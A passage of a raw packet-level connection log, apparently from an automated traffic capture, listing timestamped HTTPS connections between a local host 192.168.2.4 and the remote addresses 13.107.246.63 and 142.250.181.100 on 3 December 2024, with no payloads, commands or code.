                                                                        Dec 3, 2024 17:51:24.123419046 CET4434990713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:24.123485088 CET49907443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:24.123519897 CET49907443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:24.123533964 CET4434990713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:24.123543978 CET49907443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:24.123548031 CET4434990713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:24.126621962 CET49912443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:24.126667976 CET4434991213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:24.126782894 CET49912443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:24.126945019 CET49912443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:24.126960993 CET4434991213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:24.135488987 CET4434990813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:24.139236927 CET4434990813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:24.139297962 CET49908443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:24.139355898 CET49908443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:24.139367104 CET4434990813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:24.139379978 CET49908443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:24.139384985 CET4434990813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:24.141700983 CET49913443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:24.141733885 CET4434991313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:24.141808033 CET49913443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:24.141956091 CET49913443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:24.141968012 CET4434991313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:25.576554060 CET4434990913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:25.577604055 CET49909443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:25.577686071 CET4434990913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:25.578094006 CET49909443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:25.578109980 CET4434990913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:25.654553890 CET4434991013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:25.655668020 CET49910443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:25.655693054 CET4434991013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:25.657013893 CET49910443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:25.657021046 CET4434991013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:25.924069881 CET4434991313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:25.924779892 CET49913443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:25.924797058 CET4434991313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:25.925270081 CET49913443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:25.925275087 CET4434991313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:25.978313923 CET4434991213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:25.978950977 CET49912443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:25.978976011 CET4434991213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:25.979454994 CET49912443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:25.979465008 CET4434991213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:26.020522118 CET4434990913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:26.020662069 CET4434990913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:26.020734072 CET49909443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:26.020936012 CET49909443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:26.020936012 CET49909443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:26.020952940 CET4434990913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:26.020962954 CET4434990913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:26.021632910 CET4434991113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:26.022913933 CET49911443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:26.022922993 CET4434991113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:26.023418903 CET49911443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:26.023422956 CET4434991113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:26.025286913 CET49914443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:26.025331020 CET4434991413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:26.025424957 CET49914443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:26.025537968 CET49914443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:26.025552034 CET4434991413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:26.109795094 CET4434991013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:26.113563061 CET4434991013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:26.113646984 CET4434991013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:26.113703966 CET49910443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:26.113735914 CET49910443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:26.113828897 CET49910443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:26.113843918 CET4434991013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:26.113854885 CET49910443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:26.113866091 CET4434991013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:26.116882086 CET49915443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:26.116909027 CET4434991513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:26.117002010 CET49915443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:26.117187023 CET49915443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:26.117196083 CET4434991513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:26.360426903 CET4434991313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:26.363734961 CET4434991313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:26.363820076 CET49913443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:26.363895893 CET49913443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:26.363895893 CET49913443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:26.363904953 CET4434991313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:26.363914013 CET4434991313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:26.366889954 CET49916443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:26.366942883 CET4434991613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:26.367018938 CET49916443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:26.367399931 CET49916443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:26.367418051 CET4434991613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:26.427608013 CET4434991213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:26.431003094 CET4434991213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:26.431050062 CET4434991213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:26.431093931 CET49912443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:26.431144953 CET49912443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:26.431209087 CET49912443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:26.431231022 CET4434991213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:26.431241989 CET49912443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:26.431247950 CET4434991213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:26.436774969 CET49917443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:26.436808109 CET4434991713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:26.436939955 CET49917443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:26.437124014 CET49917443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:26.437134981 CET4434991713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:26.466546059 CET4434991113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:26.470226049 CET4434991113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:26.470335007 CET49911443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:26.470335007 CET49911443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:26.470361948 CET49911443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:26.470371962 CET4434991113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:26.475481987 CET49918443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:26.475531101 CET4434991813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:26.475613117 CET49918443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:26.475754976 CET49918443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:26.475769043 CET4434991813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:27.817796946 CET4434991413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:27.818722963 CET49914443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:27.818741083 CET4434991413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:27.819288015 CET49914443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:27.819292068 CET4434991413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:27.974576950 CET4434991513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:27.975382090 CET49915443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:27.975414991 CET4434991513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:27.975972891 CET49915443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:27.975979090 CET4434991513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:28.165158987 CET4434991613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:28.165838957 CET49916443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:28.165874004 CET4434991613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:28.166256905 CET49916443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:28.166265965 CET4434991613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:28.233972073 CET4434991713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:28.234596968 CET49917443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:28.234623909 CET4434991713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:28.235095024 CET49917443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:28.235101938 CET4434991713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:28.261811972 CET4434991413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:28.265633106 CET4434991413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:28.265711069 CET49914443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:28.265782118 CET49914443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:28.265799999 CET4434991413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:28.265809059 CET49914443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:28.265815020 CET4434991413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:28.268750906 CET49919443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:28.268780947 CET4434991913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:28.268855095 CET49919443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:28.268994093 CET49919443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:28.269004107 CET4434991913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:28.325403929 CET4434991813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:28.325982094 CET49918443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:28.326028109 CET4434991813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:28.326479912 CET49918443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:28.326489925 CET4434991813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:28.437104940 CET4434991513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:28.440243959 CET4434991513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:28.440449953 CET49915443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:28.440527916 CET49915443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:28.440546989 CET4434991513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:28.440557957 CET49915443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:28.440562963 CET4434991513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:28.443506002 CET49920443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:28.443552017 CET4434992013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:28.443622112 CET49920443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:28.443763018 CET49920443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:28.443778038 CET4434992013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:28.611846924 CET4434991613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:28.614913940 CET4434991613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:28.614955902 CET4434991613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:28.615169048 CET49916443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:28.615215063 CET49916443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:28.615232944 CET4434991613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:28.615251064 CET49916443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:28.615257025 CET4434991613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:28.617949963 CET49921443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:28.617974997 CET4434992113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:28.618073940 CET49921443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:28.618257046 CET49921443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:28.618269920 CET4434992113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:28.675244093 CET4434991713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:28.679045916 CET4434991713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:28.679131985 CET49917443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:28.679174900 CET49917443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:28.679174900 CET49917443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:28.679193974 CET4434991713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:28.679203987 CET4434991713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:28.681829929 CET49922443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:28.681878090 CET4434992213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:28.681941986 CET49922443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:28.682075024 CET49922443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:28.682089090 CET4434992213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:28.780960083 CET4434991813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:28.784035921 CET4434991813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:28.784094095 CET4434991813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:28.784125090 CET49918443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:28.784171104 CET49918443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:28.801050901 CET49918443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:28.801076889 CET4434991813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:28.801110029 CET49918443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:28.801116943 CET4434991813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:28.804052114 CET49923443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:28.804085016 CET4434992313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:28.804152966 CET49923443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:28.804289103 CET49923443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:28.804305077 CET4434992313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:30.226886034 CET4434991913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:30.227463007 CET49919443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:30.227483034 CET4434991913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:30.227922916 CET49919443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:30.227927923 CET4434991913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:30.518918037 CET4434992013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:30.519608974 CET49920443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:30.519635916 CET4434992013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:30.520068884 CET49920443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:30.520073891 CET4434992013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:30.647571087 CET4434992113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:30.648241997 CET49921443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:30.648258924 CET4434992113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:30.648350000 CET4434992213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:30.648710966 CET49921443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:30.648715973 CET4434992113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:30.648730993 CET49922443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:30.648763895 CET4434992213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:30.649513006 CET49922443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:30.649529934 CET4434992213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:30.649983883 CET4434992313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:30.650388956 CET49923443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:30.650402069 CET4434992313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:30.650738955 CET49923443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:30.650743961 CET4434992313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:30.764712095 CET4434991913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:30.767765999 CET4434991913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:30.767851114 CET49919443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:30.767891884 CET49919443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:30.767905951 CET4434991913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:30.767919064 CET49919443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:30.767924070 CET4434991913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:30.770747900 CET49924443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:30.770771980 CET4434992413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:30.770842075 CET49924443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:30.771019936 CET49924443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:30.771042109 CET4434992413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:30.981424093 CET4434992013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:30.981508970 CET4434992013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:30.981587887 CET49920443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:30.981839895 CET49920443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:30.981868982 CET4434992013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:30.981882095 CET49920443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:30.981892109 CET4434992013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:30.985157013 CET49925443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:30.985202074 CET4434992513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:30.985297918 CET49925443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:30.985476971 CET49925443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:30.985487938 CET4434992513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:31.082477093 CET4434992113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:31.082564116 CET4434992113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:31.082664013 CET49921443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:31.082945108 CET49921443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:31.082957029 CET4434992113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:31.082969904 CET49921443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:31.082974911 CET4434992113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:31.086289883 CET49926443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:31.086337090 CET4434992613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:31.086425066 CET49926443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:31.086597919 CET49926443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:31.086610079 CET4434992613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:31.086658001 CET4434992313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:31.089584112 CET4434992313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:31.089663982 CET49923443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:31.089719057 CET49923443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:31.089725018 CET4434992313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:31.089739084 CET49923443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:31.089742899 CET4434992313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:31.092324018 CET49927443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:31.092358112 CET4434992713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:31.092432022 CET49927443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:31.092619896 CET49927443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:31.092633963 CET4434992713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:31.092967987 CET4434992213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:31.096101999 CET4434992213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:31.096184015 CET49922443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:31.096259117 CET49922443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:31.096285105 CET4434992213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:31.096298933 CET49922443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:31.096307039 CET4434992213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:31.098340988 CET49928443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:31.098373890 CET4434992813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:31.098470926 CET49928443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:31.098629951 CET49928443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:31.098644018 CET4434992813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:31.758235931 CET49929443192.168.2.4142.250.181.100
                                                                        Dec 3, 2024 17:51:31.758285046 CET44349929142.250.181.100192.168.2.4
                                                                        Dec 3, 2024 17:51:31.758363008 CET49929443192.168.2.4142.250.181.100
                                                                        Dec 3, 2024 17:51:31.758651018 CET49929443192.168.2.4142.250.181.100
                                                                        Dec 3, 2024 17:51:31.758662939 CET44349929142.250.181.100192.168.2.4
                                                                        Dec 3, 2024 17:51:32.662324905 CET4434992413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:32.663291931 CET49924443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:32.663328886 CET4434992413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:32.664608955 CET49924443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:32.664614916 CET4434992413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:32.959631920 CET4434992813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:32.959723949 CET4434992613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:32.960474014 CET49928443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:32.960491896 CET4434992813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:32.960530043 CET49926443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:32.960552931 CET4434992613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:32.960954905 CET49926443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:32.960959911 CET4434992613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:32.961052895 CET49928443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:32.961059093 CET4434992813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:32.980501890 CET4434992513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:32.981204987 CET49925443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:32.981240034 CET4434992513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:32.982533932 CET49925443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:32.982541084 CET4434992513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:32.992149115 CET4434992713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:32.992714882 CET49927443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:32.992723942 CET4434992713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:32.993271112 CET49927443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:32.993275881 CET4434992713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:33.137814045 CET4434992413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:33.137937069 CET4434992413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:33.137999058 CET49924443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:33.138194084 CET49924443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:33.138216019 CET4434992413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:33.138232946 CET49924443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:33.138238907 CET4434992413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:33.141222000 CET49930443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:33.141262054 CET4434993013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:33.141349077 CET49930443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:33.141520023 CET49930443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:33.141535044 CET4434993013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:33.590907097 CET4434992613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:33.591710091 CET4434992813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:33.591798067 CET4434992813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:33.591866970 CET49928443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:33.592009068 CET49928443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:33.592009068 CET49928443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:33.592036963 CET4434992813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:33.592046976 CET4434992813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:33.593983889 CET4434992613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:33.594041109 CET4434992613.107.246.63192.168.2.4
